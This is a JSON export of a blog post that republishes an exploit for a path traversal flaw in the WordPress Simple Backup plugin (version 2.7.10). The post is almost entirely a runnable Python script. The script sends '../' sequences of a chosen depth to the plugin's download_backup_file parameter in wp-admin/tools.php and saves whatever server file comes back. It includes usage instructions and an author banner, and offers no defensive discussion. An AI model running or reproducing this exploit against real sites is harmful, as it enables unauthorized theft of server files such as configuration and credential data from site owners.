{"id":55804,"date":"2024-04-03T01:11:18","date_gmt":"2024-04-02T21:11:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177873\/wpsimplebackup-traversal.txt"},"modified":"2024-04-03T01:11:18","modified_gmt":"2024-04-02T21:11:18","slug":"wordpress-simple-backup-path-traversal-arbitrary-file-download","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-simple-backup-path-traversal-arbitrary-file-download\/","title":{"rendered":"WordPress Simple Backup Path Traversal \/ Arbitrary File Download"},"content":{"rendered":"<p># Exploit Title: Simple Backup Plugin &lt; 2.7.10 &#8211; Arbitrary File Download via Path Traversal<br \/># Date: 2024-03-06<br \/># Exploit Author: Ven3xy<br \/># Software Link: https:\/\/downloads.wordpress.org\/plugin\/simple-backup.2.7.11.zip<br \/># Version: 2.7.10<br \/># Tested on: Linux<\/p>\n<p>import sys<br \/>import requests<br \/>from urllib.parse import urljoin<br \/>import time<\/p>\n<p>def exploit(target_url, file_name, depth):<br \/>traversal = &#8216;..\/&#8217; * depth<\/p>\n<p>exploit_url = urljoin(target_url, &#8216;\/wp-admin\/tools.php&#8217;)<br \/>params = {<br \/>&#8216;page&#8217;: &#8216;backup_manager&#8217;,<br \/>&#8216;download_backup_file&#8217;: f'{traversal}{file_name}&#8217;<br \/>}<\/p>\n<p>response = requests.get(exploit_url, params=params)<\/p>\n<p>if response.status_code == 200 and response.headers.get(&#8216;Content-Disposition&#8217;) \\<br \/>and &#8216;attachment; filename&#8217; in response.headers[&#8216;Content-Disposition&#8217;] \\<br \/>and response.headers.get(&#8216;Content-Length&#8217;) and int(response.headers[&#8216;Content-Length&#8217;]) &gt; 0:<br \/>print(response.text) # Replace with the desired action for the downloaded content<\/p>\n<p>file_path = f&#8217;simplebackup_{file_name}&#8217;<br \/>with open(file_path, &#8216;wb&#8217;) as file:<br \/>file.write(response.content)<\/p>\n<p>print(f&#8217;File saved in: {file_path}&#8217;)<br \/>else:<br \/>print(&#8220;Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.&#8221;)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>if len(sys.argv) != 4:<br \/>print(&#8220;Usage: python exploit.py &lt;target_url&gt; &lt;file_name&gt; &lt;depth&gt;&#8221;)<br \/>sys.exit(1)<\/p>\n<p>target_url = sys.argv[1]file_name = sys.argv[2]depth = int(sys.argv[3])<br \/>print(&#8220;\\n[+] Exploit Coded By &#8211; Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\\n\\n&#8221;)<br \/>time.sleep(5)<\/p>\n<p>exploit(target_url, file_name, depth)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Simple Backup Plugin &lt; 2.7.10 &#8211; Arbitrary File Download via Path Traversal# Date: 2024-03-06# Exploit Author: Ven3xy# Software Link: https:\/\/downloads.wordpress.org\/plugin\/simple-backup.2.7.11.zip# Version: 2.7.10# Tested on: Linux import sysimport requestsfrom urllib.parse import urljoinimport time def exploit(target_url, file_name, depth):traversal = &#8216;..\/&#8217; * depth exploit_url = urljoin(target_url, &#8216;\/wp-admin\/tools.php&#8217;)params = {&#8216;page&#8217;: &#8216;backup_manager&#8217;,&#8216;download_backup_file&#8217;: f'{traversal}{file_name}&#8217;} response = requests.get(exploit_url, params=params) &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55804","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55804"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55804\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55804"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55804"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}